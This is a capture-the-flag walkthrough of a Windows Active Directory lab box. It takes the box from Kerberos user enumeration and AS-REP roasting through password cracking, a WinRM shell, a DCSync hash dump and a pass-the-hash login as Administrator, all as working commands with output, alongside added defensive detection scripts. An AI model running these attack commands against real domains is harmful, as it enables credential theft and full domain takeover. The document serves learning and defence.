Box download link: https://vulnyx.com/file/Controler.php.
This walkthrough follows the box author's own write-up, as a way of learning and keeping notes. After playing a lot of Linux boxes, switching to a Windows box for a change feels pretty interesting.
Port scan.
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 13:13 CST
Nmap scan report for control.nyx (192.168.56.139)
Host is up (0.00032s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-01 20:13:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:62:32:E9 (Oracle VirtualBox virtual NIC)
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m57s
| smb2-time:
| date: 2024-11-01T20:14:36
|_ start_date: N/A
|_nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:62:32:e9 (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
The ports worth attention are 88/kerberos, 389/ldap and 445/smb. The scan output also gives Domain: control.nyx; add this domain to /etc/hosts. Next, enumerate the various services for key information. SMB first: there are no usable shares.
└─$ netexec smb $IP
SMB 192.168.56.139 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
└─$ smbclient -NL 192.168.56.139
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.139 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Next RPC, which also yields nothing useful.
└─$ rpcclient -N -U "" $IP -c "querydispinfo"
result was NT_STATUS_ACCESS_DENIED
└─$ rpcclient -N -U "" $IP -c "enumdomusers"
result was NT_STATUS_ACCESS_DENIED
Now LDAP.
└─$ ldapsearch -x -H "ldap://$IP" -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=control,DC=nyx
ldapServiceName: control.nyx:controler$@CONTROL.NYX
...
namingContexts: DC=control,DC=nyx
namingContexts: CN=Configuration,DC=control,DC=nyx
namingContexts: CN=Schema,CN=Configuration,DC=control,DC=nyx
namingContexts: DC=DomainDnsZones,DC=control,DC=nyx
namingContexts: DC=ForestDnsZones,DC=control,DC=nyx
isSynchronized: TRUE
highestCommittedUSN: 73754
dsServiceName: CN=NTDS Settings,CN=CONTROLER,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=control,DC=nyx
dnsHostName: Controler.control.nyx
defaultNamingContext: DC=control,DC=nyx
currentTime: 20241101203821.0Z
configurationNamingContext: CN=Configuration,DC=control,DC=nyx
Now Kerberos. To enumerate usernames I used a common Kerberos username wordlist, https://raw.githubusercontent.com/attackdebris/kerberos_enum_userlists/refs/heads/master/A-Z.Surnames.txt, and in the end found one user: b.lewis.
└─$ kerbrute_linux_amd64 userenum --dc $IP -d control.nyx A-Z.Surnames.txt
Version: v1.0.3 (9dad6e1) - 11/01/24 - Ronnie Flathers @ropnop
2024/11/01 13:44:53 > Using KDC(s):
2024/11/01 13:44:53 > 192.168.56.139:88
2024/11/01 13:44:53 > [+] VALID USERNAME: B.LEWIS@control.nyx
2024/11/01 13:45:02 > Done! Tested 13000 usernames (1 valid) in 8.709 second
Next we use an AS-REP Roasting attack. The basic principle:
AS-REP Roasting is an attack that brute-forces a user account's password offline. Its use is rather limited, because it requires the account to have the "Do not require Kerberos preauthentication" option set, and that option is not ticked by default. Kerberos pre-authentication happens in the first phase of Kerberos authentication (AS_REQ & AS_REP); its main purpose is to prevent offline password brute-forcing. By default pre-authentication is enabled, and the KDC records the number of wrong-password attempts to prevent online brute-forcing.
Once pre-authentication is disabled, an attacker can request a ticket for the specified user from the domain controller's Kerberos port 88; the DC returns the TGT and the Login Session Key encrypted with that user's hash without performing any verification. The attacker can therefore crack the hash-encrypted Login Session Key offline, and if the wordlist is strong enough, may recover that user's plaintext password.
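An added detection example (not from the original write-up): the attack described above leaves a trace in Windows Security event 4768 on the domain controller, and the script below flags the characteristic combination of fields over a few constructed log lines. The flattened key=value layout and the IP addresses are assumptions; the field names are the 4768 event's own.

```python
import re

# One flattened 4768 event per line, "Field=value" pairs (constructed layout,
# not Windows' native XML/EVTX form; the field names are the event's own).
FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> dict:
    """Turn one flattened event line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))

def is_asrep_roast(ev: dict) -> bool:
    """AS-REP roasting indicator in a 4768 event: a TGT was issued
    (Status 0x0) with Pre-Authentication Type 0 (no pre-auth) and an RC4
    session key (TicketEncryptionType 0x17). Machine accounts ($) are skipped."""
    return (
        ev.get("EventID") == "4768"
        and ev.get("Status") == "0x0"
        and ev.get("PreAuthType") == "0"
        and ev.get("TicketEncryptionType") == "0x17"
        and not ev.get("TargetUserName", "").endswith("$")
    )

def find_roasted_accounts(log: str) -> list:
    """Return (account, requesting IP) for every suspicious 4768 event."""
    hits = []
    for line in log.splitlines():
        ev = parse_event(line)
        if is_asrep_roast(ev):
            hits.append((ev["TargetUserName"], ev.get("IpAddress", "?")))
    return hits

# Constructed sample log: a normal pre-authenticated TGT request, one
# AS-REP roast of b.lewis, a machine account, a failed request for a
# disabled account (Status 0x12) and a 4769 that must not match.
SAMPLE_LOG = """\
EventID=4768 TargetUserName=j.levy PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.5
EventID=4768 TargetUserName=b.lewis PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.99
EventID=4768 TargetUserName=CONTROLER$ PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.1
EventID=4768 TargetUserName=m.klein PreAuthType=0 TicketEncryptionType=0x17 Status=0x12 IpAddress=10.0.0.99
EventID=4769 TargetUserName=b.lewis PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.99
"""

if __name__ == "__main__":
    for account, ip in find_roasted_accounts(SAMPLE_LOG):
        print(f"possible AS-REP roasting: {account} requested from {ip}")
```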
Using an Impacket script, we obtain a crackable hash for this user.
└─$ echo "b.lewis" > user.dic
└─$ impacket-GetNPUsers control.nyx/ -no-pass -usersfile user.dic
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$b.lewis@CONTROL.NYX:cafe0af2e965c8b30ab392fcd306bb65$4cf870350488dd5ef75b8698a5955e7fa7c881da679e2ff04584acdce215d62745bce14880882e291087fd6b15b9cc1e6ebbb54ff9384a28fb501f551959a1b654bcdb93e830d63a2f085dc36d59843dbbfb2701aec4bd95cb427ebefd3027585915d925db075bcacbd8983d78ddbc258bbb627d3dd7dd5a83679bacb032ad30f7b65659c4f4bede49b49e0b45bc51e013a17bb3bbc1dc62cddb28e573907727759201972e26c6f6aac2b750f99a2109ae0224c88307be5bc50e7bcab2bb4a39f40333df131cbcb7715e07b5ffe51de755ce8f89b8fee766cb55031e1143e5aa387364c23f1523bd4ea7
Crack the hash to obtain the password.
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music ($krb5asrep$23$b.lewis@CONTROL.NYX)
1g 0:00:00:13 DONE (2024-11-01 13:53) 0.07173g/s 965362p/s 965362c/s 965362C/s 101eagles..101Mromally
Use the "--show" option to display all of the cracked passwords reliably
We can verify that this username and password work against SMB, but WinRM still refuses the login.
└─$ netexec smb $IP -u 'b.lewis' -p '101Music'
SMB 192.168.56.139 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB 192.168.56.139 445 CONTROLER [+] control.nyx\b.lewis:101Music
└─$ netexec winrm $IP -u 'b.lewis' -p '101Music'
WINRM 192.168.56.139 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.139 5985 CONTROLER [-] control.nyx\b.lewis:101Music
With authenticated RPC we can enumerate further users.
└─$ rpcclient -U "b.lewis%101Music" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[j.levy] rid:[0x44f]
user:[b.lewis] rid:[0x450]
user:[m.klein] rid:[0x451]
user:[d.petrov] rid:[0x452]
user:[a.hansen] rid:[0x453]
┌──(kali㉿mykali)-[~/Documents/controler]
└─$ rpcclient -U "b.lewis%101Music" $IP -c "querydispinfo"
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen Name: Axel Hansen Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis Name: Ben Lewis Desc: (Account Enabled)
index: 0xfb0 RID: 0x452 acb: 0x00000211 Account: d.petrov Name: Dave Petrov Desc: (Account Disabled)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: (Account Disabled)
index: 0xfac RID: 0x44f acb: 0x00000210 Account: j.levy Name: John Levy Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfaf RID: 0x451 acb: 0x00000211 Account: m.klein Name: Mike Klein Desc: (Account Disabled)
From this, j.levy and b.lewis are the usable accounts; the other usernames are disabled. We can brute-force j.levy's SMB password.
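An added example (not from the original write-up) that decodes the acb field printed by querydispinfo above, using the SAMR ACB_* account-control bits from MS-SAMR; the sample lines are four of the lines from the output above. Besides flagging disabled accounts, it exposes the bit that makes an account AS-REP roastable, which is the setting a defender audits for.

```python
import re

# SAMR account-control bits (MS-SAMR 2.2.1.13, USER_ACCOUNT codes); only the
# bits relevant to this box are listed.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000004: "PWNOTREQ",               # no password required
    0x00000010: "NORMAL",                 # normal user account
    0x00000200: "PWNOEXP",                # password never expires
    0x00000400: "AUTOLOCK",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00010000: "DONT_REQUIRE_PREAUTH",   # the AS-REP roasting precondition
}

# Matches the acb and Account fields of one querydispinfo line
LINE_RE = re.compile(r"acb:\s*0x([0-9a-fA-F]+)\s+Account:\s*(\S+)")

def decode_acb(value: int) -> list:
    """Return the names of the set ACB bits, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if value & bit]

def audit(querydispinfo_output: str) -> dict:
    """Parse querydispinfo lines and flag risky account settings per account."""
    report = {}
    for line in querydispinfo_output.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        acb, account = int(m.group(1), 16), m.group(2)
        flags = decode_acb(acb)
        enabled = "DISABLED" not in flags
        report[account] = {
            "flags": flags,
            "enabled": enabled,
            "asrep_roastable": enabled and "DONT_REQUIRE_PREAUTH" in flags,
        }
    return report

# Sample input: four lines from the querydispinfo output on this box
SAMPLE = """\
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen Name: Axel Hansen Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis Name: Ben Lewis Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
"""

if __name__ == "__main__":
    for account, info in audit(SAMPLE).items():
        print(f"{account:14} enabled={info['enabled']!s:5} roastable={info['asrep_roastable']!s:5} {info['flags']}")
```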
└─$ netexec smb $IP -u 'j.levy' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding -t 10
...
SMB 192.168.56.139 445 CONTROLER [+] control.nyx\j.levy:Password1
j.levy can connect over WinRM.
└─$ netexec winrm $IP -u 'j.levy' -p 'Password1'
WINRM 192.168.56.139 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.139 5985 CONTROLER [+] control.nyx\j.levy:Password1 (Pwn3d!)
└─$ evil-winrm -i 192.168.56.139 -u 'j.levy' -p 'Password1'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents> whoami
control\j.levy
Upload SharpHound to the target, run it and collect the data.
*Evil-WinRM* PS C:\Users\j.levy\Documents> upload SharpHound.exe
Info: Uploading /home/kali/Documents/controler/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe
Data: 1402880 bytes of 1402880 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe
2024-11-01T14:13:02.3921638-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Initializing SharpHound at 2:13 PM on 11/1/2024
2024-11-01T14:13:02.5592260-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for control.nyx : Controler.control.nyx
2024-11-01T14:13:02.6911408-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-01T14:13:02.7181923-07:00|INFORMATION|Beginning LDAP search for control.nyx
2024-11-01T14:13:02.7655606-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-01T14:13:02.7655606-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-01T14:13:33.0039549-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-11-01T14:13:48.3628044-07:00|INFORMATION|Consumers finished, closing output channel
2024-11-01T14:13:48.4043452-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Status: 95 objects finished (+95 2.111111)/s -- Using 51 MB RAM
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Enumeration finished in 00:00:45.6989181
2024-11-01T14:13:48.4881995-07:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.
54 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-11-01T14:13:48.4881995-07:00|INFORMATION|SharpHound Enumeration Completed at 2:13 PM on 11/1/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir
Directory: C:\Users\j.levy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/1/2024 2:13 PM 11381 20241101141348_BloodHound.zip
-a---- 11/1/2024 2:13 PM 8136 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a---- 11/1/2024 2:12 PM 1052160 SharpHound.exe
*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20241101141348_BloodHound.zip
Info: Downloading C:\Users\j.levy\Documents\20241101141348_BloodHound.zip to 20241101141348_BloodHound.zip
Info: Download successful!
Unzipping the collected archive gives several JSON files. jq can be used to inspect them; note that the j.levy user has AllExtendedRights.
└─$ jq "." 20241101141348_users.json
{
"Properties": {
"domain": "CONTROL.NYX",
"name": "J.LEVY@CONTROL.NYX",
"distinguishedname": "CN=JOHN LEVY,CN=USERS,DC=CONTROL,DC=NYX",
"domainsid": "S-1-5-21-2142633474-2248127568-3584646925",
"highvalue": false,
"samaccountname": "j.levy",
...
{
"PrincipalSID": "CONTROL.NYX-S-1-5-32-544",
"PrincipalType": "Group",
"RightName": "AllExtendedRights",
"IsInherited": true
},
Since j.levy's privileges are high, we can dump the administrator's hash. Note the command syntax here: secretsdump DOMAIN/USER:PASSWORD@DOMAINCONTROLLER.
└─$ impacket-secretsdump control.nyx/j.levy:Password1@CONTROL.NYX -target-ip 192.168.56.139
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70cca1e5225303104dea9942d31f3a7:::
control.nyx\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
control.nyx\b.lewis:1104:aad3b435b51404eeaad3b435b51404ee:08f37c649690b7df615961f71831ef4a:::
control.nyx\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\d.petrov:1106:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\a.hansen:1107:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
CONTROLER$:1000:aad3b435b51404eeaad3b435b51404ee:97a43247d14c80f991b4e6ccbc61f8be:::
[*] Kerberos keys grabbed
Using the administrator's hash, we can log in and get root.
└─$ evil-winrm -i 192.168.56.139 -u 'administrator' -H 48b20d4f3ea31b7234c92b71c90fbff7
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
control\administrator
A small aside: impacket-secretsdump normally prints lines in the format username:RID:LM hash:NTLM hash:::other info.
Username: the account name (e.g. Administrator).
RID: the account's Relative Identifier, the last part of the Windows Security Identifier (SID), used to uniquely identify an account within the domain.
LM hash: the LAN Manager hash, old and weak. It is usually empty on modern systems (aad3b435b51404eeaad3b435b51404ee is the empty LM hash).
NTLM hash: the NT LAN Manager hash, the more common hash format on Windows, storing the hash of the user's password.
Other info: additional information, usually including password-history hashes, service credentials and so on.
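An added example (not from the original write-up) that parses lines in this format and reports what a defender looks for in such a dump: LM hashes still set, empty NT hashes, and accounts sharing one NT hash (that is, the same password). The sample dump is constructed, with hash values made up and account names modelled on this box.

```python
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

def parse_secretsdump_line(line: str):
    """Split one user:rid:lmhash:nthash::: line; return None for other lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
        return None
    user = parts[0].split("\\")[-1]          # drop any "domain\" prefix
    return {"user": user, "rid": int(parts[1]), "lm": parts[2].lower(), "nt": parts[3].lower()}

def audit_dump(dump: str) -> dict:
    """Report LM hashes set, empty NT hashes and NT hashes shared by accounts."""
    by_nt = defaultdict(list)
    lm_set, empty_nt = [], []
    for line in dump.splitlines():
        rec = parse_secretsdump_line(line)
        if rec is None:
            continue
        by_nt[rec["nt"]].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            lm_set.append(rec["user"])
        if rec["nt"] == EMPTY_NT:
            empty_nt.append(rec["user"])
    shared = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"lm_set": lm_set, "empty_nt": empty_nt, "shared_nt": shared}

# Constructed sample dump (hash values made up, names modelled on this box)
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
control.nyx\\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
control.nyx\\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy.svc:1200:0102030405060708090a0b0c0d0e0f10:abcdefabcdefabcdefabcdefabcdefab:::
"""

if __name__ == "__main__":
    findings = audit_dump(SAMPLE_DUMP)
    print("LM hash set:   ", findings["lm_set"])
    print("empty NT hash: ", findings["empty_nt"])
    for h, users in findings["shared_nt"].items():
        print(f"NT hash {h} shared by {users}")
```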